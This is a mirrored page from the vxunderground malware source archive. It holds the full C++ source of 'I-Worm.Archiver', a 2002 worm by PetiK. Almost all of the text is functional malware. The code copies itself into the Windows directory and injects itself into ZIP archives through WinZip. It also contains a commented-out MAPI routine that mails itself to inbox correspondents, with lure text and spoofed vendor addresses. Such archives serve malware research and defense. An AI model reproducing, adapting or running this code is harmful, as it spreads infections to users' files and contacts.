mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
228 lines
6.1 KiB
C
228 lines
6.1 KiB
C
/*
|
|
Name : I-Worm.Archiver
|
|
Author : PetiK
|
|
Date : Mai 10th 2002 -
|
|
Language : C++
|
|
|
|
Comments : Infect ZIP files which run with WINZIP.
|
|
|
|
We can also to do the same think with PowerArchiver:
|
|
powerarc -a -c4 archive.zip virus.exe
|
|
|
|
*/
|
|
|
|
#include <windows.h>
|
|
#include <stdio.h>
|
|
#include <mapi.h>
|
|
|
|
#pragma argused
|
|
#pragma inline
|
|
|
|
|
|
char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
|
|
char *fnam[]={"news","support","info","newsletter","webmaster"};
|
|
char *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
|
|
LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
|
|
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
|
|
char attname[]="news_xxxxxxxx.exe";
|
|
LPTSTR cmdLine,ptr;
|
|
BOOL installed;
|
|
BYTE desktop[50],favoris[50],personal[50],winzip[50];
|
|
DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
|
|
sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
|
|
DWORD type=REG_SZ;
|
|
long i;
|
|
|
|
LHANDLE session;
|
|
MapiMessage *mes;
|
|
MapiRecipDesc from;
|
|
char messId[512],mname[50],maddr[30];
|
|
HINSTANCE hMAPI;
|
|
|
|
HKEY hReg;
|
|
WIN32_FIND_DATA ffile;
|
|
|
|
void infzip(char *);
|
|
|
|
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
|
|
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
|
|
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
|
|
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
|
|
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
|
|
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
|
|
|
|
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
|
|
{
|
|
|
|
GetModuleFileName(hInst,filen,100);
|
|
GetSystemDirectory((char *)sysdir,100);
|
|
GetWindowsDirectory((char *)copyn,100);
|
|
strcpy(windir,copyn);
|
|
strcat(copyn,"\\Archiver.exe");
|
|
|
|
installed=FALSE;
|
|
cmdLine=GetCommandLine();
|
|
if(cmdLine) {
|
|
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
|
|
if(ptr[0]=='-' && ptr[1]!=0) {
|
|
switch(ptr[1]) {
|
|
default:
|
|
break;
|
|
case 'i':
|
|
installed=TRUE;
|
|
break;
|
|
case 'p':
|
|
ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
|
|
MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
|
|
"I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
|
|
ExitProcess(0);
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
if(!installed) {
|
|
CopyFile(filen,copyn,FALSE);
|
|
strcpy(copyreg,copyn);
|
|
strcat(copyreg," -i");
|
|
/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
|
|
RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
|
|
RegCloseKey(hReg); */
|
|
ExitProcess(0);
|
|
}
|
|
|
|
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
|
|
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
|
|
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
|
|
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
|
|
RegCloseKey(hReg);
|
|
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
|
|
RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
|
|
RegCloseKey(hReg);
|
|
|
|
if(strlen(winzip)!=0) {
|
|
infzip(windir);
|
|
infzip(sysdir);
|
|
infzip(desktop);
|
|
infzip(personal);
|
|
infzip(favoris);
|
|
infzip("C:\\");
|
|
}
|
|
|
|
/*
|
|
_asm
|
|
{
|
|
call @wininet
|
|
db "WININET.DLL",0
|
|
@wininet:
|
|
call LoadLibrary
|
|
test eax,eax
|
|
jz end_asm
|
|
mov ebp,eax
|
|
call @inetconnect
|
|
db "InternetGetConnectedState",0
|
|
@inetconnect:
|
|
push ebp
|
|
call GetProcAddress
|
|
test eax,eax
|
|
jz end_wininet
|
|
mov edi,eax
|
|
verf:
|
|
push 0
|
|
push Tmp
|
|
call edi
|
|
dec eax
|
|
jnz verf
|
|
|
|
end_wininet:
|
|
push ebp
|
|
call FreeLibrary
|
|
end_asm:
|
|
jmp end_all_asm
|
|
|
|
Tmp dd 0
|
|
|
|
end_all_asm:
|
|
}
|
|
|
|
|
|
hMAPI=LoadLibrary("MAPI32.DLL");
|
|
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
|
|
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
|
|
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
|
|
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
|
|
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
|
|
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
|
|
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
|
|
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
|
|
do {
|
|
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
|
|
strcpy(mname,mes->lpOriginator->lpszName);
|
|
strcpy(maddr,mes->lpOriginator->lpszAddress);
|
|
|
|
for(i=0;i<8;i++)
|
|
attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
|
|
fsubj[0]=0;
|
|
wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);
|
|
|
|
|
|
mes->ulReserved=0;
|
|
mes->lpszSubject=fsubj;
|
|
mes->lpszNoteText="This is some news send by our firm about security.\n"
|
|
"Please read by clicking on attached file.\n"
|
|
"\tBest Regards";
|
|
mes->lpszMessageType=NULL;
|
|
mes->lpszDateReceived=NULL;
|
|
mes->lpszConversationID=NULL;
|
|
mes->flFlags=MAPI_SENT;
|
|
mes->lpOriginator->ulReserved=0;
|
|
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
|
|
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
|
|
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
|
|
mes->nRecipCount=1;
|
|
mes->lpRecips->ulReserved=0;
|
|
mes->lpRecips->ulRecipClass=MAPI_TO;
|
|
mes->lpRecips->lpszName=mname;
|
|
mes->lpRecips->lpszAddress=maddr;
|
|
mes->nFileCount=1;
|
|
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
|
|
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
|
|
mes->lpFiles->ulReserved=0;
|
|
mes->lpFiles->flFlags=NULL;
|
|
mes->lpFiles->nPosition=-1;
|
|
mes->lpFiles->lpszPathName=filen;
|
|
mes->lpFiles->lpszFileName=attname;
|
|
mes->lpFiles->lpFileType=NULL;
|
|
mSendMail(session, NULL, mes, NULL, NULL);
|
|
}
|
|
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
|
|
free(mes->lpFiles);
|
|
mFreeBuffer(mes);
|
|
mLogoff(session,0,0,0);
|
|
FreeLibrary(hMAPI);
|
|
}
|
|
|
|
*/
|
|
|
|
ExitProcess(0);
|
|
}
|
|
|
|
void infzip(char *folder)
|
|
{
|
|
register bool abc=TRUE;
|
|
register HANDLE fh;
|
|
if(strlen(folder)!=0) {
|
|
SetCurrentDirectory(folder);
|
|
fh=FindFirstFile("*.zip",&ffile);
|
|
if(fh!=INVALID_HANDLE_VALUE) {
|
|
while(abc) {
|
|
inzip[0]=0;
|
|
wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
|
|
WinExec(inzip,1);
|
|
abc=FindNextFile(fh,&ffile);
|
|
}
|
|
}
|
|
}
|
|
|
|
}
|